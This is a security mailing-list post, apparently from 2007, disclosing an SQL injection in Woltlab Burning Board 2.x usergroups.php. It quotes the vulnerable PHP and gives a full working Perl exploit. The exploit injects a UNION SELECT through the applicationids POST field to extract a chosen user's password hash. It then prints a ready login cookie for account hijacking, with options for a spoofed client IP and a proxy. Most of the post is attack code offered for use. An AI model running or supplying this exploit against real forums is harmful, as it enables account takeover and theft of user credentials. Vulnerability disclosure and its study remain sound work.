Woltab Burning Board SQL Injection usergroups.php Mar 14 2007 09:52PM
x666 Safe-mail net
Hi,

A new SQL Injection in the wbb2.x

[CODE]

/** delete applications (groupleader) **/

if ($action == 'groupleaders_deleteapplications') {

$deleteids = array();

if (is_array($_POST['applicationids'])) while (list($applicationid, $val) = each($_POST['applicationids'])) if ($val == 1) $deleteids[] = $applicationid;

if ($deleteids) {

$result = $db->query("SELECT a.applicationid,gl.userid FROM bb".$n."_applications a LEFT JOIN bb".$n."_groupleaders gl ON (gl.groupid=a.groupid) WHERE applicationid IN(".implode(",", $deleteids).") AND gl.userid='$wbbuserdata[userid]'");

while ($row = $db->fetch_array($result)) if ($row['userid'] == $wbbuserdata['userid']) $db->unbuffered_query("DELETE FROM bb".$n."_applications WHERE applicationid='$row[applicationid]'", 1);

}

header("Location: usergroups.php?action=groupleaders" . $SID_ARG_2ND_UN);

exit;

}

[/CODE]

[EXPLOIT]

#!/usr/bin/perl

# Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl

# written by x666 <blueshisha (at) safe-mail (dot) net [email concealed]>

# jmp-esp.kicks-ass.net;blueshisha.chills.it

# SR-CREW

# should work on every wbb regardless of php settings.

#

#

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Response;

use HTTP::Status;

use Getopt::Std;

getopt('uiUpAcC');

our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );

my $target = shift;

sub do_request($$);

if ( !$target ) { &HELP_MESSAGE; }

if ( !$opt_U && !$opt_C) { &HELP_MESSAGE; }

my ( $host, $folder );

if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {

$host = $1;

$folder = ( $2 ? $2 : '/' );

if ( $folder !~ /\/$/ ) { $folder .= '/'; }

$target = "http://$host$folder" . 'usergroups.php';

}

else { &HELP_MESSAGE; }

my $ip = ( $opt_i ? $opt_i : '127.0.0.1' );

my ( $userid, $userpassword, $proxy, $proxyip );

( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;

( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p;

my $uid = ( $opt_u ? $opt_u : 1 );

my $useragent =

( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );

my $isHash = 0;

print "burned2.pl written by x666\n";

print "report errors \@ blueshisha\@safe-mail.net.. thx\n";

print "[x] Attacking $target...\n";

if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }

if ( !$opt_c ) {

my $headers = do_request( '', '' );

if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {

$prefix = $1;

}

else { print $headers}

}

print "[x] Cookie prefix: $prefix\n";

print "[x] Vulnerable check:";

my $answer;

my $pre;

$answer = do_request( '\'', '' );

if ( $answer =~ /FROM (.*?)_applications/ ) {

$pre = $1;

print " Vulnerable\n";

}

elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/

or $answer =~ /Access denied/ )

{

print " No Idea\n";

print "[x] usergroups.php only for users,";

print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;

exit;

}

else {

print " Not Vulnerable!\n";

print $answer;

exit;

}

print "[x] Unleashing black magic...\n";

$answer = do_request(

'/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''

);

if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {

print "[x] Looks good!\n";

print "[x] Userid: $uid\n";

print "[x] Hash: $1\n";

if ( !$opt_C ) {

print

"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";

}

}

else {

print "[x] Looks bad!\n";

print $answer;

}

sub HELP_MESSAGE() {

print "burned2.pl written by x666\n"

. "perl $0 [options] url\n"

. "examples:\n"

. "perl $0 -U 10:123456 woltlab.de/de/forum/\n"

. "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"

. "overwrite -c only when the auto-check "

. "gives you a false result\n"

. "use -C when you need some special cookies\n"

. "options :\n-u userid of victim [1]\n"

. "-i faked client-ip [127.0.0.1]\n"

. "-U userid:password or userid:pwhash [none]\n"

. "-p proxyip:proxyport [none]\n"

. "-A user-agent [firefox 1.5.09]\n"

. "-c cookie-prefix [auto-check]\n"

. "-C raw cookie\n";

exit;

}

sub do_request($$) {

my $string = shift;

my $otherurl = shift;

if ($otherurl) { $target = "http://$host$folder" . $otherurl; }

else { $target = "http://$host$folder" . 'usergroups.php' }

$string = '/*' if ( !$string );

my $ua = LWP::UserAgent->new;

if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }

my $request = new HTTP::Request( 'POST', $target );

$request->content( 'applicationids%5B0)' . $string . '%5D=1'

. '&action=groupleaders_deleteapplications');

$request->authorization_basic('projectb', 'neustart');

$request->content_type('application/x-www-form-urlencoded');

$request->header( 'User-Agent' => $useragent );

if ($opt_U) {

my $userhash;

if ( !$isHash ) { $userhash = md5($userpassword); }

else { $userhash = $userpassword; }

my $cookie = $prefix

. 'userid='

. $userid . ';'

. $prefix

. 'userpassword='

. $userhash;

$request->header( 'Cookie' => $cookie );

}

elsif ($opt_C) {

$request->header( 'Cookie' => $opt_C );

$userid=3265;
}

$request->header( 'Client-Ip' => $ip );

my $response = $ua->request($request);

my $body = $response->content;

my $headers = $response->headers_as_string;

$body = $response->error_as_HTML if ( $response->is_error );

return $headers if ( $string eq '/*' and !$response->is_error );

return $body;

}

# MD5 Code ripped from Libwhisker for bigger portability

# thx rfp :)

{

my ( @S, @T, @M );

my $code = '';

sub md5 {

return undef if ( !defined $_[0] ); # oops, forgot the data

my $DATA = _md5_pad( $_[0] );

&_md5_init() if ( !defined $M[0] );

return _md5_perl_generated( \$DATA );

}

sub _md5_init {

return if ( defined $S[0] );

my $i;

for ( $i = 1 ; $i <= 64 ; $i++ ) {

$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

}

my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

for ( $i = 0 ; $i < 64 ; $i++ ) {

$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

}

@M = (

0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,

1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,

5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,

0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9

);

&_md5_generate();

my $TEST = _md5_pad('foobar');

if ( _md5_perl_generated( \$TEST ) ne

'3858f62230ac3c915f300c664312c63f' )

{

die('Error: MD5 self-test not successful.');

}

}

sub _md5_pad {

my $l = length( my $msg = shift() . chr(128) );

$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

$l = ( $l - 1 ) * 8;

$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

return $msg;

}

sub _md5_generate {

my $N = 'abcddabccdabbcda';

my ( $i, $M ) = ( 0, '' );

$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems

$code = <<EOT;

sub _md5_perl_generated {

BEGIN { \$^H |= 1; }; # use integer

my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

my (\$a,\$b,\$c,\$d,\$t,\$i);

my \$dr=shift;

my \$l=length(\$\$dr);

for my \$L (0 .. ((\$l/64)-1) ) {

my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));

(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

for ( $i = 0 ; $i < 16 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 32 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 48 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 64 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

$code .= <<EOT;

\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

} # for

return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

eval "$code";

}

} # md5 package container

[/EXPLOIT]

Greets,
666

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus